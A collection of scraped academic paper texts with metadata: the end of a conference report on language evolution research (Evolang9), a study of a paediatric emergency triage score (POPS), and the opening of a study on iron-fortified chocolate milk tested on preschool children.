signal.
Barceló-Coblijn & Gomila were not the only participants to remind the audience of the very specific nature of linguistic symbols. Piattelli-Palmarini also mentioned properties of words that make them more than other symbols: aspectual reference, headedness, internal structure, and the previously mentioned edge features.
In the context of Evolang9, the previous considerations on lexicalization and combinatorial properties could be connected more generally to the cognitive context of language evolution. James Hurford commented on Merge, which can be said to extend the previous notion of lexicalization and lies at the center of the Minimalist Program within generative grammar (Chomsky 1993, 1995). Whether this cognitive capacity came before or after externalization is at stake: externalization enables communication with others, while Merge may not only enhance it but also participate in the development of complex private thoughts. Which came first is hard to know, since, as demonstrated by Hurford, a double dissociation exists between having complex private thoughts and possessing a complex communication system. However, biolinguist Cedric Boeckx took a side and argued that communication played no role in the initial development of linguistic cognitive abilities (although it later became relevant with cultural transmission). The merging operation was listed, along with the edge property and cyclic transfer (or phase), as one of the three minimally specified syntactic components needed for a plausible UG. Boeckx further introduced the notion of a global neuronal workspace (GNW) to provide a frame in which bridges could be built across previously disconnected cognitive modules; a language of thought, with lexicalization and then merging of concepts, allowed meanings of various natures to integrate (Boeckx 2012). This approach explicitly echoed Fodor's language of thought (Fodor 1975), but was also reminiscent of Fauconnier & Turner's (1998, 2002) scope blending, or Mithen's (1996) cognitive fluidity. The GNW was furthermore rooted in brain structure and evolution. First, neurons with long-distance connections were seen as central in cross-module exchange. Second, modern humans' brains evolved to be more globular than our ancestors' (Neubauer & Hublin 2011, Gunz et al. 2012), thus leading to easier communication between, on average, spatially closer areas. According to Boeckx, no matter whether it derived from constraints linked to locomotion, bite force, cognition, and so on, the evolution of brain shape provided easier cross-modularity.
Other contributions detailed the evolution of language in the brain and alongside other cognitive abilities. Some talks focused on non-linguistic capacities in animals, like Kazuo Fujita's search for meta-cognition (Fujita 2012), or Moore's (2012) and Froese et al.'s (2012) studies of primates' depth of analysis of others' actions, whether or not in the context of communication. As usual, coevolution enjoyed popularity, with various proposals. Invited speaker Tao Gong attempted to simulate the co-evolution of language acquisition and joint attention (Gong & Shuai 2012), while Michael Arbib (2012) and Russell Gray put forward the now classical relationship between language, gesture, and tool use.
The results of the previously mentioned PET recordings of tool-makers were particularly stressed by Gray: the manufacture of late Acheulean tools, but not of older Oldowan or even of early Acheulean tools, resulted in increased activation in areas of (i) the parietofrontal praxis circuits in both hemispheres and (ii) the right-hemisphere homologue of Broca's area. The hierarchical complexity of the organization of actions in the later tools correlates with the syntactic features of modern language, among others recursion. Tetsuro Matsuzawa gave an example illustrating the idea that abilities may not always be reinforced in a co-evolutionary fashion: his trade-off theory of memory and representation articulates the acquisition of language with the strong decrease in eidetic imagery in humans, backed by experiments demonstrating the highly efficient eidetic memory of chimpanzees (Inoue & Matsuzawa 2007).
Finally, the social and cultural frame of language was considered through the prisms of psychology, linguistics, animal studies, and modeling.
At the core level of interactions, Matsuzawa insisted on the significant consequences of the differences in mother-child bonding between non-human primates and humans. While baby primates cling to their mothers during the first months of their lives, early physical separation in humans allows face-to-face communication, vocal exchange, and early object manipulation. The cries of human babies are absent in other primates, whose young move by themselves to reach their mothers' breasts.
At a larger scale, models tend to focus on the co-evolution of social and linguistic conventions. Models have evolved from homogeneous populations to structured yet static communities (e.g., Nettle 1999), before the introduction of more dynamic ties between agents (e.g., Gong & Wang 2005, Gong 2010). Bachwerk & Vogel (2012) presented a model in which social ties are continuously updated based on the success of previous interactions. Using a control parameter defining how cautious or impulsive the agents were in establishing friendships (that is, reinforcing their tie with another agent) over successive communications, the authors concluded that a high social update rate (making friends quickly but also forgetting older friends faster) paralleled sociological observations and was very likely in early hominids, despite raising questions about how systems of conventions could then be built at a large scale.
In addition to the building of friendship and cooperation, the role of conflict and competition between individuals was also considered in the emergence of language. The possibility of cooperative behavior under natural selection at the individual level has long been questioned (e.g., Axelrod & Hamilton 1981), and simulations like the previous one often leave this problem aside, although it applies to the emergence of language as a specific form of cooperation based on exchanging information. Jacob Foster elaborated on recent work on the evolution of human cooperation, emphasizing intergroup competition as a factor favoring intra-group cooperation (Boyd & Richerson 2009). In this context he considered language as a catalyst for other intra-group cooperative behaviors and an accelerator of cultural differentiation (Foster 2012).
These different studies all show that careful consideration of social structure is necessary, both to capture the inter- and intra-group relationships that prevailed during hominid prehistory, and to account for the specific social distributions observed today, like scale-free or small-world networks, or quantitative observations like Dunbar's (2010) number of 'relationships'.
The socio-cultural environment of our hominid ancestors was finally addressed by a few contributors, although one may consider that, as in previous Evolang conferences, this line of research was not as prominent as it perhaps should be: indeed, theories and models about languages in animals and modern humans always run the risk of diverging from the actual course of prehistory. Archaeological and palaeo-anthropological data are safeguards against attractive but ultimately artificial evolutionary scenarios, but they also suffer from the complex chains of inference needed to go from often scarce material remains to behaviors and collective thinking. This was apparent in Cuthbertson & McCrohon's (2012) re-reading of the evidence on sea-crossings, leading them, contrary to others (Davidson & Noble 1992, Morwood & Cogill-Koez 2007), to deny the need for a sophisticated language to account for this behavior. In a similar fashion, Johansson (2012) reviewed the evidence for Neanderthal language, building on data which lead to a variety of interpretations, likely depending on the intuitions of the scholars making use of them. A recurrent problem therefore lies in the integration of such data with other analyses of language evolution.
Future Research on the Evolution of Language
What conclusions may be drawn from the previous sections in terms of future research on the evolution of language, and can suggestions be made regarding potentially fruitful explorations? First, the experimental trend on communication/coordination games is likely to develop in the coming years and strengthen itself as a fruitful paradigm. Just as computer simulations gradually shifted from the emergence of 'simple' linguistic conventions (holistic words, vowels, word orders) to more refined linguistic constructions (say, the expression of space; Spranger & Steels 2012), we may expect future games to focus on more specific linguistic domains (Steels 2012). They will then touch more closely on the grammatical devices used in modern languages and how such devices may have emerged in the past, thus connecting to similar attempts by 'traditional' linguists (e.g., Carstairs-McCarthy 1999, 2010; Heine & Kuteva 2007). However, one may wonder whether they will not meet the same difficulties as some current models: as games grow in complexity, deciphering and presenting the emerging processes at hand becomes difficult. As when describing a formerly unknown language, providing a synchronic description of its linguistic processes can prove daunting; adding the additional layer of complexity that diachrony and emergence create often raises more issues than it solves.
Recording 'online' brain activities as people engage in communicative activities seems another exciting avenue for research. With the simultaneous recording of several subjects, correlating synchronization at the psychological, linguistic, and neuronal levels becomes possible, which in a way opens the door to the idea of 'neuro-pragmatics'.
Integrating replicative archaeology and brain imaging, and analyzing the neural patterns of activities such as tool-making in the light of language-related brain areas, also appears attractive. Tool-making and the related, precise control of motor actions are appealing in regard to the fine motor control needed for speech, but what other activities could be studied? The Symbolic Revolution around 50,000 years before present, as observed by archaeologists in Europe and independently of its exact causes in the broader context of Homo sapiens' emergence in Africa (Conard 2010, d'Errico & Stringer 2011), suggests looking at the making of more artistic and symbolic objects: anthropomorphic or zoomorphic sculptures, for example the ivory lion-man of Stadel-Höhle im Hohlenstein or the Venus of Hohle Fels (Conard 2009), or musical instruments like flutes (Higham et al. 2012). What are the psychological and neurophysiological differences between making a tool and making a piece of art? Does an additional amount of imagination and creativity get reflected in brain activations, continuously or intermittently, during the making of the latter? Do we observe a clear distinction, as between Oldowan and Acheulean, or a continuum going from purely 'functional' tools (that is, whose only goal is, say, to scrape meat, not to carry symbolic meanings) to tools with symbolic markings to 'non-functional' objects like figurative sculptures?
Focusing on the neural aspects of the evolution of language also suggests addressing more closely the neurophysiology of language production and perception. Indeed, the neural bases of our communication system cover not only high-level cognitive functions but also lower-level sensory and motor abilities that are essential and sometimes unique to our species. The neurophysiology of the emergence of speech has been addressed by some scholars (e.g., Kay et al. 1998, MacNeilage 1998, DeGusta et al. 1999, McLarnon 1999, Davis & MacNeilage 2004), though their focus has mostly been on production. Although the issue was rather left aside during Evolang9, Shuai & Gong (2012) addressed the perceptual side by shedding some light on categorical perception, the functional lateralization of which was considered in the broader framework of language evolution (Wilkins & Wakefield 1995, Gannon et al. 1998, Cantalupo & Hopkins 2001, Botha 2003).
Departing from the preceding topics, another option for future research lies in semiotic approaches to early forms of symbolism (Coupé 2012). This line of thinking has been partially explored by palaeo-anthropologists (e.g., Henshilwood & Dubreuil 2009, Rossano 2010), but the investigations are often restricted to the surface of semiotic science (like Peirce's notions of icon, index, and symbol) and could make better use of the typologies of signs established by semioticians (e.g., Peirce 1998, Farias & Queiroz 2003). Just as some speakers insisted on the special semiotic status of linguistic units with respect to other symbols, one could question the specificities of archaeological artifacts as signs, or investigate whether the semiotic specificities of linguistic units also apply to them.
Finally, given the emphasis on the complexity of the relationship between genotype and phenotype, one may look for more realistic models of biological evolution in simulations integrating biology, culture, and learning. Many results on strong or weak innate biases behind today's linguistic universals are based on rather simple, if not sometimes simplistic, models of genetic regulation. One may therefore ask whether significantly different outputs could be obtained with designs involving gene networks rather than more independent genetic units.
As a conclusion, it appears that research on the evolution of language successfully follows an integrative path when it comes to the methods and fields involved. Concepts previously designed for the sole field of modeling, like iterated learning, have met the experimental field with success. Replicative archaeology, which previously helped us understand our ancestors' past behaviors (including language), is now benefiting from brain imaging techniques. Animal studies are starting to apply these techniques too, as well as network analysis. Theoretical notions of the Minimalist Program are now said to find their roots in the past evolution of brain shapes. To us, this is a strong sign of the vitality of the field, whose actors already plan to meet at Evolang10 in Vienna in 2014.
"year": 2013,
"sha1": "31ad123639276607d8ef19a310a8e46c476e7c48",
"oa_license": "CCBY",
"oa_url": "https://doi.org/10.5964/bioling.8973",
"oa_status": "GOLD",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "197fe8a21a19c49d159dd1d2fb7c96d04e36acd5",
"s2fieldsofstudy": [
"Linguistics"
],
"extfieldsofstudy": [
"Computer Science"
]
} |
The Paediatric Observation Priority Score: A System to Aid Detection of Serious Illness and Assist in Safe Discharge
The Paediatric Observation Priority Score (POPS) is a bespoke assessment tool for use in Paediatric Emergency Departments incorporating traditional physiological parameters alongside more subjective observational criteria. Initial performance characteristics of POPS were analysed in a convenience sample of 936 presentations to ED. Triage on the basis of gut instinct parameters identified an additional 261 patients deemed of lowest acuity compared to analysis by physiology scores. Resource consumption increased with increasing acuity on presentation. POPS shows promise in assisting in the assessment process of children presenting to Emergency Departments. Inclusion of subjective triage criteria helps contextualise the physiological parameter scoring by using the experience of staff conducting triage. Initial interpretation of presenting physiology gives a more informed assessment of initial acuity, and thus is better able to identify a child who can be safely managed in the community. The system also allows for rapid detection of those most unwell.
Introduction
Children with serious illness can be difficult to spot, especially for inexperienced staff. Healthcare systems face a challenge in selecting these children from an ever-increasing pool of attendances to emergency and urgent care providers [1]. Determining the relative acuity of children presenting to emergency and urgent care environments has traditionally been done on the basis of triage. Triage is a time-based system and does not always accurately reflect the illness or eventual disposition of the patient [2]. In adult practice, Early Warning Scores (EWS) have been used to detect serious illness, but there are no validated systems for children. A recent retrospective study employing ward-based systems in Children's Emergency Departments (EDs) demonstrated their ability to detect children requiring intensive care but not those requiring admission [3]. Given that the majority of children presenting to emergency or urgent care services are likely to be discharged, the systems employed need to assist in identifying both the sickest children and those who are well enough to go home.
Locally, we created the Paediatric Observation Priority Score (POPS), using current evidence and the experience of senior paediatric emergency clinicians. We noted the only previous work in this field, by Bradman and Maconochie [4], and aimed to expand on their initial findings that an early warning score system was of limited value in predicting admission but was useful in determining discharge. POPS is a physiological and observational scoring system (range 0-16) designed for use by health care professionals of varying clinical experience at initial assessment in an urgent or emergency care setting.
It consists of 8 domains (oxygen saturations, level of alertness, extent of breathing difficulty, background history, nurse gut feeling, heart rate, respiratory rate and temperature), each graded 0, 1 or 2 to give a maximum total score of 16 (Appendix). Physiological sub-scores carry a total of 10 points, with gut instinct and appearance sub-scores (level of alertness, extent of breathing difficulty and gut feeling) contributing a further 6 potential points. The parameters were chosen based on APLS guidance and their utilisation in other scoring systems. The visual style was developed from nurses' feedback over a 1-month period and constantly refined.
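The arithmetic of the score can be made explicit with a short sketch. The Python snippet below tallies a total POPS and its two sub-scores from already-graded domains; the domain names follow the text, the grouping of the five 10-point domains is inferred from the stated point totals, and the thresholds that map raw observations to a 0, 1 or 2 live in the published chart (Appendix) and are not reproduced here.

```python
# Hypothetical tally of a POPS assessment from pre-graded domains.
GUT_DOMAINS = {"alertness", "breathing_difficulty", "gut_feeling"}
PHYS_DOMAINS = {"oxygen_saturations", "background_history",
                "heart_rate", "respiratory_rate", "temperature"}

def pops(grades: dict) -> dict:
    """grades maps each of the 8 domain names to an integer 0, 1 or 2."""
    assert set(grades) == GUT_DOMAINS | PHYS_DOMAINS
    assert all(g in (0, 1, 2) for g in grades.values())
    physiology = sum(grades[d] for d in PHYS_DOMAINS)   # 0-10
    gut = sum(grades[d] for d in GUT_DOMAINS)           # 0-6
    return {"total": physiology + gut, "physiology": physiology, "gut": gut}

example = pops({"oxygen_saturations": 0, "background_history": 1,
                "heart_rate": 1, "respiratory_rate": 0, "temperature": 1,
                "alertness": 0, "breathing_difficulty": 1, "gut_feeling": 0})
print(example)  # {'total': 4, 'physiology': 3, 'gut': 1}
```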
A small pilot phase in 100 patients (presented at a regional paediatric meeting) demonstrated acceptability and feasibility. This paper, describing the first stage of an ongoing validation process, reports the initial prospective evaluation.
Methods
Leicester Royal Infirmary is a paediatric tertiary centre with a dedicated Children's ED. Since POPS was introduced in the ED, data have been collected prospectively on the demographics of attendees, their initial POPS on presentation, resource consumption in ED and eventual outcome from the department. All patients attending the paediatric ED receive an initial triage assessment by a trained nurse competent in the use of POPS.
We identified the above data parameters in a randomly selected sample of patients who attended the department between 08/01/09 and 07/01/11. A database of 936 patients aged 0-15 years was constructed. The initial POPS at triage was used to determine acuity on presentation to ED. Alongside total POPS, the constituent physiology and gut-instinct sub-scores were recorded for each presentation.
This database was interrogated to determine whether the inclusion of gut instinct parameters at triage augments POPS' ability to identify patients of low presenting acuity who may be suitable for discharge home or to community care teams. The length of stay in the department and subsequent ED resource consumption (imaging modality, IV access, bloods, analgesia, oxygen, nebuliser, fluid and antibiotic utilisation) were also investigated. Patient outcome in ED (i.e. discharge destination), duration of stay in the department and resource consumption were therefore analysed as functions of total POPS and its constituent sub-scores. The data were arranged in order of descending patient acuity as analysed by total POPS and its constituent sub-scores. Physiology sub-scores were grouped into narrow ranges of values. A pragmatic assumption was made that a physiology sub-score of 1-2 out of a possible 10 is equivalent to a gut instinct sub-score of 1 out of 6, that 3-4 out of 10 (physiology) is equivalent to 2 out of 6 (gut instinct), and so on, such that six equivalent degrees of presenting acuity were assigned for the physiology and gut-instinct sub-scores to facilitate comparison. A score of zero in either sub-score was deemed equivalent.
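This banding can be written down compactly. The sketch below encodes the stated equivalences as two small lookup functions, using the A-F band labels from the legend of Table 2; it is a hypothetical helper for illustration, not code from the study.

```python
# Map POPS sub-scores onto the six equivalent acuity bands A-F
# described in the text (A = a sub-score of 0 on either scale).
def physiology_band(score: int) -> str:
    """Physiology sub-score out of 10 -> band A-F."""
    assert 0 <= score <= 10
    return "ABCDEF"[0 if score == 0 else (score + 1) // 2]

def gut_band(score: int) -> str:
    """Gut instinct/appearance sub-score out of 6 -> band A-F."""
    assert 0 <= score <= 6
    return "ABCDEF"[min(score, 5)]

# Quick check of the stated groupings: 0->A, 1-2->B, ..., 9-10->F.
print([physiology_band(s) for s in range(11)])
print([gut_band(s) for s in range(7)])
```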
Line charts and histograms collating data on the number of presentations for each relative degree of acuity were created in the above contexts. Microsoft Excel software (2010) was used to produce all graphs.
Results
The distribution of initial triage POPS of the attendees is shown in Figure 1. 32% of all patients had a POPS of 0, 37% had a POPS of 1-2 and 21% a POPS of 3-4.
The average duration of stay in ED for all patients was 137.2 minutes, regardless of POPS and eventual outcome. Taking this into account, Figure 2 shows variation by POPS from the overall average time spent in ED.
The eventual outcome of each patient was analysed by initial POPS at the time of presentation (Table 1). Included in the table below is one child who presented with a triage POPS of 12 and went to PICU (paediatric intensive care unit). This child is categorised under Children's Admissions Unit (CAU)/Ward, as it represents an admission to a hospital bed.
77.8% ((185 + 47)/298) of children with a triage POPS of 0 were discharged from ED. Ignoring triage POPS and taking the population as a whole, 55% of all patients were discharged home directly from ED; this figure rises to 64% when those amenable to re-direction are considered. Table 2 shows outcomes as analysed by physiology and instinctive sub-scores.
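As a quick check of the headline figure (the counts 185 and 47 are not labelled in the text, but presumably correspond to two discharge destinations in Table 1):

```python
# Reproducing the quoted discharge proportion for children with triage POPS = 0.
discharged_pops0 = (185 + 47) / 298
print(f"{discharged_pops0:.1%}")  # -> 77.9%, matching the quoted 77.8% to rounding
```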
Figure 3 shows that both sub-scores perform similarly in terms of predicting the likely discharge disposition for a patient attending with each respective POPS score. This figure assumes that a score of zero for POPS, physiology and gut instinct are equivalent (point A), as are a score of 1-2 for physiology and a score of 1 for gut instinct (point B), and so on.
Figure 4 shows the average number of interventions per patient in the ED, organised by POPS score and eventual outcome in terms of clinical management.
Discussion
POPS provides a methodology for classifying acuity in a Children's Emergency Department that is pragmatic, supports disposition and equates to resource utilisation. In this initial validation cohort, the majority of presentations were of children of low clinical acuity when analysed by POPS; 69% of all attendees had a total POPS of 2 or less.
By incorporating gut instinct and appearance factors into the triage scoring of patients, we are able to expand the evidence available to contextualise the clinical management decisions that we make. Triaging patients on the basis of their gut instinct and appearance sub-score identified an additional 261 patients of the 936 sampled who were of the lowest stratification of acuity and therefore potentially suitable for discharge from emergency care. Further work is needed to determine whether these observational characteristics can be used in isolation.
When considering duration of stay in ED (Figure 2), it is apparent that those with a total POPS of 2-7 appear to stay in ED for longer than the average waiting time. This may be because they are more unwell than those with lower POPS and require stabilisation, or require more investigations or assessment prior to decision making with regard to discharge disposition and outcome. It is noted that those with higher total POPS of 8-10 also stay in the department for less time than average. A potential explanation would be that these patients are referred efficiently once it is apparent that they require hospital admission, although the low patient numbers exhibiting this level of acuity demonstrate a need for further work to delineate this pattern.
It is a reasonable assumption that those patients of higher clinical acuity will require the most resources in terms of investigation and intervention. Figure 4 shows judicious use of ED investigation in those patients who are immediately re-directed to urgent care centres and other community care teams. As anticipated, those patients who are discharged from ED consume fewer resources than those who are admitted.

Table 2. Outcome of all 936 children presenting to ED by their physiology and gut instinct sub-scores of POPS. Physiology (P) sub-scores in white, out of 10. Gut Instinct (I) sub-scores in grey, out of 6. A = P0 G0, B = P1-2 G1, C = P3-4 G2, D = P5-6 G3, E = P7-8 G4, F = P9-10 G5-6.

This study is of relatively old data because the lead author undertook a nationally funded fellowship in another research area during 2010-13. The results are consistent with an ongoing study [5] and with another group who have utilised POPS in their own department [6]. POPS remains one of the few published Emergency Department-specific scoring systems [7].
Conclusions
The premise of the Paediatric Observation Priority Score (POPS) is simple: it represents a bespoke method of identifying children with potentially serious illness while at the same time safely supporting staff in redirecting or discharging those who do not need ongoing care. This allows the most sick and the most well children to be clearly identified early in the patient journey. POPS has demonstrated a functional ability to aid healthcare professionals' decision making. The results of this work have led to a larger-scale study (United Kingdom Clinical Research Network study number 11532) and to its deployment in other centres around the United Kingdom.
With further investigation and refinement, we believe POPS will reduce risk-averse strategies of referring all children of 'potential concern' for specialist paediatric assessment (a practice that overloads an already stretched out-of-hours system and leads to unnecessary hospital admissions, which is poor from both a resource and a patient/family care point of view), while at the same time ensuring the most unwell patients are recognised.
Figure 1. Distribution of POPS summated for all age groups of Emergency Department attendees.
Figure 2. Average time in department by POPS relative to overall average waiting time.
Figure 3. Percentage of patients discharged home from ED by their total and constituent POPS.
Figure 4. Average number of interventions per person attending ED by POPS and outcome.
Table 1. Outcome of 936 children presenting to the Emergency Department by their initial POPS. The urgent care centre is run by General Practitioners (Family Doctors), and this outcome indicates the child has been discharged into primary care.
"year": 2016,
"sha1": "716a9f79eb1a5613928e3e30ce8c579da8ddb815",
"oa_license": "CCBY",
"oa_url": "http://www.scirp.org/journal/PaperDownload.aspx?paperID=67309",
"oa_status": "GOLD",
"pdf_src": "ScienceParseMerged",
"pdf_hash": "716a9f79eb1a5613928e3e30ce8c579da8ddb815",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
Development of iron-fortified chocolate milk for preschool children based on sensory acceptability
Milk is among the most important foods in children's daily diets and may be a suitable option for fortification with minerals such as iron, helping to reduce iron deficiency and anemia in children. The objective of the present investigation was to fortify pasteurized chocolate-flavored milk with heme iron from pig blood powder and to study its sensory acceptability in a group of children aged 3-5 years. The study variables in milk preparation were iron concentration and sugar content. The central composite design and the response optimization allowed an optimal range to be found, corresponding to 25% of the recommended dose of iron for children. The formula with the highest acceptability (4.72/5) presented a concentration of 13.65 mg Fe L⁻¹, 693 mg L⁻¹ vitamin C and 60 g L⁻¹ sugar. According to the physicochemical and microbiological results, the fortified flavored milk complied with regulations and had an approximate shelf life of 5 days. These results demonstrate an alternative for heme-iron fortification of chocolate milk, whose content could contribute to the daily requirement of this mineral in children aged 3-5 years (11 mg of iron per day, for a consumption of 250 mL).
Introduction
From the physiological point of view, iron is considered a mineral of great importance for the normal development of human beings, as well as necessary for the correct functioning of the organism. The lack of iron in the body is due, in most cases, to the fact that the mineral is found in greater proportion in its ferric form, which is more difficult to absorb; its deficiency is also attributed to poor consumption in the daily diet (Serpa et al., 2016). On the other hand, heme iron is the biological iron that is easily absorbed by intestinal mucous membrane cells and can be used not only as part of iron supplements but also as an enhancer of food nutrition (Man et al., 2022).
Dairy products are poor in iron and some other minerals, so fortification with Fe would help avoid the previously mentioned nutritional deficiencies. The concentration of Fe in milk is around 0.2 mg kg⁻¹; therefore, adding Fe to this product can favor the daily intake of this nutrient. Parameters for evaluating the effects of iron added to dairy products include fat oxidation, flavor, shelf life, microbial physiology, sensory quality, and general acceptance of the fortified product (Gahruie et al., 2015). Some research details that fat oxidation in chocolate milk fortified with a ferric polyphosphate-whey protein complex was avoided and the product showed an acceptable taste (Douglas et al., 1981). However, fortification with ferric chloride or ferrous gluconate was not acceptable, and ferric ammonium citrate increases oxidation in milk (Gahruie et al., 2015). Due to the above, it is necessary to find a balance between the incorporation of iron (and its forms) and sensory acceptability.
Among the various techniques used for sensory analysis, affective tests are used to evaluate consumer preference and/or acceptance with respect to products (Navarro et al., 2013). Illustrated face scales show a spectrum of sensory experiences, eliminating the need for raters to quantify their experience numerically, for example, when the raters are children (Garra et al., 2010). These sensory and hedonic methods have been applied with the purpose of optimizing food to develop healthier options that are liked by children (Laureati et al., 2015).
Among investigations of the sensory evaluation of fortified milk drinks is a chocolate drink with hydrolyzed lactose (50%) enriched with amino-chelated iron (iron bisglycinate) at 5% of the RDI (recommended daily intake), which obtained good sensory acceptability in a sensory ranking test carried out with 7 trained judges. It was also concluded that iron bisglycinate affected the color, which limited its use in chocolate milk beverages (Hernández, 2017). On the other hand, Villalpando et al. (2006) evaluated the efficacy of whole cow's milk fortified with ferrous gluconate and zinc oxide, along with ascorbic acid, for improving iron status in children 10 to 30 months of age. The prevalence of anemia decreased from 41.4 to 12.1% (P < 0.001) after 6 months, and the results could lead to expanding a subsidized fortified-milk distribution program to 4.2 million beneficiary children aged 1 to 11 years in Mexico. Recently, de Matos et al. (2021) developed a fermented drink, replacing milk with whey and adding mangaba pulp (Hancornia speciosa Gomes) and iron, to improve the nutritional quality of the products. The work highlighted the contribution of proteins, calcium and iron to the daily recommended intake of the formulations (8.4%, 15.2% and 44.3%, respectively), and the increase in whey concentration in the formulation improved acceptability, ranking 91.5% for children and 73.6% for adolescents.
In a previous investigation, heme iron was used, establishing the concentrations of iron and chocolate as variables, which influenced the acceptability of fortified milk (García et al., 2022). This was appreciated by children between 8 and 11 years old, with the highest acceptability from 6.76 mg Fe kg⁻¹ (range 6.4-12.8 mg Fe kg⁻¹) and 2.0 g kg⁻¹ (range 2-4 g kg⁻¹) of chocolate. The iron content represented approximately 21% of the recommended dose for children in this age range (8 mg Fe/day, with a consumption of 250 g of milk). For this reason, it is also necessary to evaluate other parameters that can influence sensory acceptability for children in other age ranges, with a higher iron content that contributes to improving iron deficiencies in the daily diet.
Therefore, this study aimed to identify the ideal composition of heme iron-fortified, chocolate-flavored milk samples, based on a central composite design, by analyzing iron and sugar concentration levels with respect to their sensory acceptability as appreciated by a group of children between 3 and 5 years old, measured with a facial hedonic scale test, together with the subsequent physicochemical and microbiological characterization.
Materials
Homogenized milk was obtained from the Milk Pilot Plant of La Molina National Agrarian University. Whole blood powder of pig origin, Aprosan TM (188 mg Fe per 100 g of product), alkalized cocoa powder, ascorbic acid, carrageenan, liquid vanilla, cinnamon, aniseed, clove, commercial sucrose and chocolate bits (Frutarom Peru S.A.) were used. Food additives were food grade.
Iron-fortified chocolate milk
Iron-fortified chocolate-flavored milk was prepared based on the Peruvian Technical Standard NTP 202.189.2020 (INACAL, 2020), using fresh milk, commercial sucrose, flavorings, ascorbic acid and authorized additives. Aprosan TM powder was completely diluted in cold milk at 10°C, which was then heated to 30°C, at which point cinnamon, cloves and anise were added. Heating continued up to 50°C, where sugar, cocoa, carrageenan and vitamin C were added; vanilla and chocolate were added at 60°C. The product was pasteurized under Low Temperature and Long Time (LTLT) conditions, at 72°C for ten minutes, using a stainless-steel 100 L jacketed pot. Subsequently, the iron-fortified chocolate-flavored milk was filtered to retain the remaining clove, cinnamon and anise residues. Finally, the milk was bottled in 250 mL plastic bottles and stored at room temperature. Table 1 shows the ingredients used in the formulation of the chocolate milk and their respective amounts.
Experimental design
The central composite design was used to investigate the effects of heme iron and sugar concentrations and to determine the optimum formulations. Three concentration levels (low, medium and high) were evaluated for each variable across the nine formulations of the design (Table 2). For iron, the high level corresponded to 30% fortification (13 mg L⁻¹) for 1 L of milk; the optimization results below indicate that the low level corresponded to 25% fortification (11 mg L⁻¹). The sugar levels were chosen based on the concentration of 50 g of sugar per liter provided in Law No. 30021, the Law for the Promotion of Healthy Eating (El Peruano, 2017). The low level of sugar represents 50 g L⁻¹, the intermediate level 55 g L⁻¹ and the high level 60 g L⁻¹, for 1 L of milk.
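For two factors at three levels, the face-centred central composite design reduces to nine runs (four factorial points, four axial points and one centre point), which can be enumerated directly. A sketch, assuming 12 mg L⁻¹ as the intermediate iron level (the text only states the bounds explicitly):

```python
from itertools import product

# Face-centred central composite design for 2 factors at 3 levels = 9 runs.
# Sugar levels are stated in the text; the intermediate iron level of
# 12 mg/L is an assumption interpolated between the 11 and 13 mg/L bounds.
iron_levels = (11, 12, 13)    # mg Fe per L of milk
sugar_levels = (50, 55, 60)   # g sugar per L of milk

formulations = [
    {"run": i + 1, "iron_mg_per_L": fe, "sugar_g_per_L": su}
    for i, (fe, su) in enumerate(product(iron_levels, sugar_levels))
]
for f in formulations:
    print(f)   # nine formulations, F1..F9
```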
Sensory analysis
The facial hedonic scale test was performed with a total of 120 preschoolers, aged 3-5 years, who were untrained users from a public school in the city of Lima, Peru. They were asked to rate their overall acceptability on a 5-point hedonic scale (1 = I dislike a lot, 2 = I dislike, 3 = I don't like or dislike, 4 = I like, 5 = I like it a lot).
Children were asked to mark the facial image that best represented how much they enjoyed each product (Figure 1). A 5-point hedonic facial scale was chosen because it has been reported to be applicable to children of the same age range (Chen et al., 1996); furthermore, it is recommended to use hedonic scales with words only with children older than 8 years (Laureati et al., 2015). Some researchers highlight the advantage of using facial images as a nonverbal approach that conveys meaning and evaluates children's emotional responses to food products, which makes them feel more comfortable with their use (da Cruz et al., 2021).
The overall acceptability value for each formulation was obtained as the sum of the children's acceptability scores divided by the number of children surveyed.
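In other words, overall acceptability is a simple arithmetic mean of the 1-5 ratings; the ratings below are hypothetical and serve only to illustrate the calculation:

```python
# Overall acceptability = sum of 1-5 hedonic ratings / number of children.
ratings = [5, 4, 5, 5, 3, 4, 5]           # hypothetical panel responses
overall_acceptability = sum(ratings) / len(ratings)
print(round(overall_acceptability, 2))    # -> 4.43 on the 1-5 scale
```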
Statistical analysis
The results of the sensory analysis of the formulations obtained by the central composite design were subjected to an analysis of variance (ANOVA) using Minitab Version 17 to determine the significance of the coefficients in the model at a confidence level of 95% (p < 0.05). The model fit was verified using the R² value. The most accepted formulation was then used in the preparation of the fortified flavored milk for its subsequent characterization. ANOVA is an optimal and well-known statistical tool for comparing products, and sensory acceptance data are generally evaluated using this analysis. Sensory acceptance analysis is a parametric test with assumptions to be validated, such as the homogeneity of the residual variance (Navarro et al., 2013).
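The same model fit and significance test can be reproduced outside Minitab. A sketch with Python's statsmodels, where the acceptability values are hypothetical placeholders for the study's scores:

```python
import pandas as pd
import statsmodels.api as sm
import statsmodels.formula.api as smf

# Quadratic response-surface model for sensory acceptability (sa) as a
# function of iron (x1) and sugar (x2); data frame contents are illustrative.
df = pd.DataFrame({
    "x1": [11, 11, 11, 12, 12, 12, 13, 13, 13],             # mg Fe / L
    "x2": [50, 55, 60, 50, 55, 60, 50, 55, 60],             # g sugar / L
    "sa": [4.5, 4.6, 4.72, 4.4, 4.5, 4.6, 4.2, 4.3, 4.5],   # hypothetical
})
model = smf.ols("sa ~ x1 + x2 + I(x1**2) + I(x2**2) + x1:x2", data=df).fit()
print(sm.stats.anova_lm(model, typ=2))   # term significance at alpha = 0.05
print("R^2 =", round(model.rsquared, 3))
```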
Milk characteristics
Physicochemical characterization was carried out for fresh milk and fortified flavored milk based on Peruvian technical regulations. The protein analysis was carried out by the Kjeldahl total-nitrogen determination method (NTP 202.119:1998-2014) (INACAL, 1998a). The amounts of total solids and ash were obtained based on NTP 202.118:1998-2021 and NTP 202.012:2008-2018, respectively (INACAL, 1998b, 1998c). Viscosity was determined using a Brookfield viscometer. The fat analysis was carried out by the Weibull-Berntrop gravimetric method (ISO 8262, 2005), and iron was analyzed according to AOAC 985.35 (AOAC, 2016). Vitamin C was analyzed by a titration method according to AOAC 985.33 (AOAC, 2016a). The determination of mesophilic aerobes and coliforms was carried out based on ICMSF (2000).

Table 2. Variables and levels used for the experimental design.
Fortification for 1 L of milk (recommended dose: 11 mg Fe per day for a portion of 250 g of milk).
Sensory analysis
